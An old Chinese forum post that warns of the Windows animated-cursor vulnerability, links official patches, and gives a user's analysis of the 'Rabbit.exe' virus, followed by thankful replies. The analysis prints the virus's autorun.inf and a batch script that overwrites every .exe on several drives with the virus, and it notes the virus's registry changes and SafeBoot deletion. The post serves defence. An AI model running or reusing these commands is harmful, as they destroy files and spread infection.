温馨提示(4月11日更新)
[size=4]最近网上很多网站都被黑客挂上了利用微软最新鼠标漏洞下载的盗号木马...为了大家各种网银...网GAME...论坛等的帐号安全...中国邀请在线特别提醒您安装微软官方补丁...以保安全......注:如果您曾安装了eEye第三方补丁程序...请先到控制面板...添加删除程序里卸载[color=red]eEye Digital Security Ani Zero day patch[/color]
[/size][url=http://download.microsoft.com/download/5/8/3/58324bce-00c5-42b7-bd05-1353c0604dab/WindowsXP-KB925902-x86-CHS.exe][size=4][color=seagreen]点击下载XP 32位中文系统专用微软鼠标光标漏洞补丁[/color][/size][/url][size=4]
[/size][url=http://download.microsoft.com/download/d/4/d/d4d5b707-58a9-4fbc-ab58-e20cc86db7bb/Windows2000-KB925902-x86-CHS.EXE][size=4][color=magenta]点击下载2000 SP4中文系统专用微软鼠标光标漏洞补丁[/color][/size][/url]
[url=http://download.microsoft.com/download/0/4/7/0472557e-05f2-471e-a018-3286d63c51c3/Windows6.0-KB925902-x86.msu][size=4][color=red]点击下载VISTA中文系统专用微软鼠标光标漏洞补丁[/color][/size][/url]
[size=4][color=red][b]警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】[/b][/color][/size]
[size=3][color=darkgreen]2007-04-08,在剑盟浏览帖子发现有网友提到一个名为“兔宝宝”(Rabbit.exe,文件大小:260K)的病毒。
依我看,Rabbit.exe叫“小兔仔子”可能更贴切[img]http://forum.ikaka.com/icon/face5.gif[/img]
下载该样本,在“影子系统”下观察了一下其感染系统的情形(卡巴斯基和瑞星最新病毒库均查不到此毒)。现将所见过程罗列如下,希望大家警惕。
1、病毒运行后释放的病毒文件见图1。此毒运行后关闭Tiny的Activity Monitor、SSM、IceSword等窗口。
2、msexch400.dll是此毒的一个重要角色(插入winlogon.exe进程且不能强制卸除)。
3、病毒在硬盘各分区根目录和U盘根目录下创建autorun.inf和Rabbit.exe。autorun.inf文件内容如下:
autorun.inf
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
love.bat的内容如下:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
4、注册表改动:
(1)在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项:
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:\WINDOWS\system32\JK.exe
(2)删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
5、系统文件以外(包括非系统分区)的.exe文件均被替换为260K大小的病毒文件(文件名还是原来正常.exe的文件名),图标变为“兔宝宝”(图2)。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。
6、Tiny用户,即使预先设置了相关文件保护规则,病毒依然可以突破Tiny的FD规则,将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是我第一次遇到可以突破Tiny 文件保护的病毒。
7、还观察到此毒的另一个有趣行为:在系统分区以外的分区中,只要发现一个DLL文件(如:abc.dll),病毒即刻创建一个同名的、260K的.exe(abc.exe),图标也是“兔宝宝”。
8、中招后,用户就别指望扫什么劳什子日志求助了。运行任何.exe(当然包括SRENG等),你只能见到一闪而过的命令提示符窗口(实际运行的是那个260K的病毒体)。
9、此毒可能认为自己很NB,并未没采用多数病毒的常用策略————禁用taskmgr和regedit。
10、此毒不能突破“影子系统”。安装SSM和Tiny的用户,Rabbit.exe运行时,用户可看到相应提示对话框。如果用户足够警惕且予以正确回应,SSM和Tiny可阻止此毒运行。
[/color][/size]
[size=4]请大家注意定时升级反毒毒软件和及时升级系统......中国邀请在线在此祝您玩得安全和愉快......[/size] 已经补了,也已经杀了,谢谢提醒啊。 呵呵 早就打上了 呵呵谢谢居士哈 我用的是番茄2.6,Win XP SP2的,自动更新我关闭 了,不知道需要吗 谢谢提醒,赶快补上:v08 谢谢!弄好了!!!! 谢谢提醒,我在补呢! 谢谢提示,已经下载
:v01 谢谢,现在下呢,:v04 :v43 前两天已经安装过了,好像到处都有呢 :v43 谢谢提醒啊。 下载了!·!
过会安装啊 谢谢 ,提醒得及时。赶紧忙去。 谢谢,正在下载中!:v01 谢谢了,已经打上了。 今天机子正好中毒了,不知和这有没有关系,还是打上的好,谢谢兄弟分享了!!! 我的应该是自动更新的时候补上了 不错啊
提示还算及时
不过早就打了 我正在补,谢谢了:v01 谢谢了~补好了~哈哈